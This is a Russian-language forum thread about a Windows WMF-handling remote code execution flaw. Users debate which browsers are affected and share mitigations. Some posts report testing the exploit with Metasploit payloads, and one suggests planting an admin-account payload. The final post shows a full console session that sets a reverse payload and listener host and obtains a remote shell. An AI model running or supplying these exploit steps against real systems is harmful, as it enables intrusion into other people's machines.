Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 3 4 5 След.
RSS
Выполнение произвольного кода в Microsoft Windows при обработке WMF фа
 
Обсуждение статьи Выполнение произвольного кода в Microsoft Windows при обработке WMF файлов
 
Ага, а так же отрубить Инет, выключить ПК и пойте спать) :D
 
Цитата
sh2kerr пишет:
это случайно не из билютени Windows (MS05-053)?
похоже что нет
во всяком случае патч не спасает...
 
я вот и думаю что что-то новое , хотя очнь похоже , г-бы описание почитать поконкретнее на secfocus'е тоже ничего конкретного нет :(

Цитата
во всяком случае патч не спасает...
проверял уже  ?
 
либо я но у меня при загрузке wmf файла вылетает ошибка rundll32.exe и в IE и в FIREFOX     может я payload не тот забиваю я ставлю payload win32_exec ?  кто тэстил поделитесь опытом  

вопрос:  ошибка преднамеренно в эксполоите или я чтото не так делаю ?
 
понял  :D  , win32_remote  надо было

ну нифигасебе действительно работает , я просто в шоке !!!!видимо скоро появится какойнидь icq/irc червячок впаривающий ссылки
 
>Решение: ....... установить высокий уровень безопасности в Internet Explorer

А что, есть еще идиоты, которые лазяют по инету с не "lockdown" IE? Правда, когда ему гайки закрутишь и с умом настроишь - красота полная. Все остальное отдыхает!
 
>А что, есть еще идиоты, которые лазяют по инету с не "lockdown" IE? Правда, когда ему гайки закрутишь и с умом настроишь - красота полная. Все остальное отдыхает!

В большинстве своем IE использую специалисты экстра-класса, которые с трудом усвоили с какой стороны подходить к компьютеру, и, естественно, они все до одного в курсе существования каких-то там "lockdown", киллеров спайвари и адвари и прочих приблуд к решету, а остальные пользуются Мозиллой, Файрфоксом, Оперой и о каких-то там "локдаунах" не слышали, т.к. ненужно было.
 
Цитата
В большинстве своем IE использую специалисты экстра-класса, которые с трудом усвоили с какой стороны подходить к компьютеру, и, естественно, они все до одного в курсе существования каких-то там "lockdown", киллеров спайвари и адвари и прочих приблуд к решету, а остальные пользуются Мозиллой, Файрфоксом, Оперой и о каких-то там "локдаунах" не слышали, т.к. ненужно было.

согласен  

но не пойму с чего вы набросились на IE      ?
firefox и opera в конфигурации по умолчанию даже не пискнули !! и и remote shell был получен , бага то не в IE  а в программе просмотра изображений , так что ставьте ACDSEE и все будет пучком  ;)
 
Да уж, эксплоит. Для даунов он. Все нормальные давно уже ослом не пользуются..
 
В качестве временного решения:
regsvr32 /u shimgvw.dll
 
Цитата
firefox и opera в конфигурации по умолчанию даже не пискнули !!
А можеть указать урл, с которого опера открывает это wmf?
 
интересно, насколько часто попадаются сайты с WMF? да одно уже расширение вызывает подозрение. )) был бы косяк при  обработке GIF/JPEG/PNG кои  вхлам популярны - была б пандемия. а так ... ну может павда червяк какой поблудит недельки две пока дядя Каспер его в свои базы не внесет. И все ...
 
Давно пользуюсь Firefox и необращаю внимание на эти дыры для IE)))
 
Цитата
TroFF пишет:
Давно пользуюсь Firefox и необращаю внимание на эти дыры для IE)))
Для тех, кто в танке, еще раз просьба прочитать статью. Уязвимость НЕ в браузере!
 
Цитата
Да уж, эксплоит. Для даунов он. Все нормальные давно уже ослом не пользуются..  

да , конено все 80 % давно уже не пользуютя и ваще наверно при покупке компа сносят винду нах ставят какоенибудь openbsd и в интернет только через lynx/links заходят  :D  

Цитата
Давно пользуюсь Firefox и необращаю внимание на эти дыры для IE)))


амёбы  :!:

Цитата
А можеть указать урл, с которого опера открывает это wmf?

экслоит запусти и будет тебе url

Цитата
интересно, насколько часто попадаются сайты с WMF? да одно уже расширение вызывает подозрение

кстати не скажи , расширение  .WMF можно принять за каойнибудь видеофайл  оно смахивает на чтото среднее между SWF  и  WMA  так что так с виду сразу и не просечь  особенно если не шаришь  ;)
 
дак фаил этот кинул (с параметрами создание адинского аккаунта в системе) на жёсткий или ваше в сеть
и как только админ просто увидит фаил так и создасться пользователь.
 
Цитата
амёбы
FF и опера спрашивают юзера перед открытием wmf.
Если ты утверждаешь обратное
Цитата
firefox и opera в конфигурации по умолчанию даже не пискнули !!
, давай код, поглядим, насколько ты прав.

Цитата

экслоит запусти и будет тебе url
Вот-вот, запусти. А весь смысл в том, что в IE без участия юзера запускается.
 
Цитата
rebiata raslabtes splojt klasno rabotajet i zagruzajet exe na masinku )
wmf mozno pereimenovat v jpg
Не надо наводить панику, переименуешь - и будет обрабатываться как jpeg, в результате не покажет ничего, и код не получит кпраление. Это в опере 8.51 и фф 1.5. В IE да, можно как угодно переименовывать, всегда работает. Проверено.
 
Работает как часы:

Цитата

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.100.100
LHOST -> 192.168.100.100
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.100.46:1060 using Windows XP
[*] Got connection from 192.168.100.100:4321 <-> 192.168.100.46:1061

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Gidzen\Desktop>
Страницы: 1 2 3 4 5 След.
Читают тему